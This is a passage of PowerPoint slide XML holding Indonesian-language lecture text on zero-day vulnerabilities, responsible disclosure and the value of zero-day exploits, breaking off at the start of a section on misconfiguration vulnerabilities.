              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menanggulanginya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penemuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero-day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlombaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero-day, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>etis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengungkapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerugian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penemuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero-day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Istilah "zero-day" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> malware yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengeksploitasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero-day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero-day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bernilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jutaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dolar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akibatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>musuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero-day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bernilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Badan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penegak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> negara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zero-day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyelidikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyebab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebocoran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
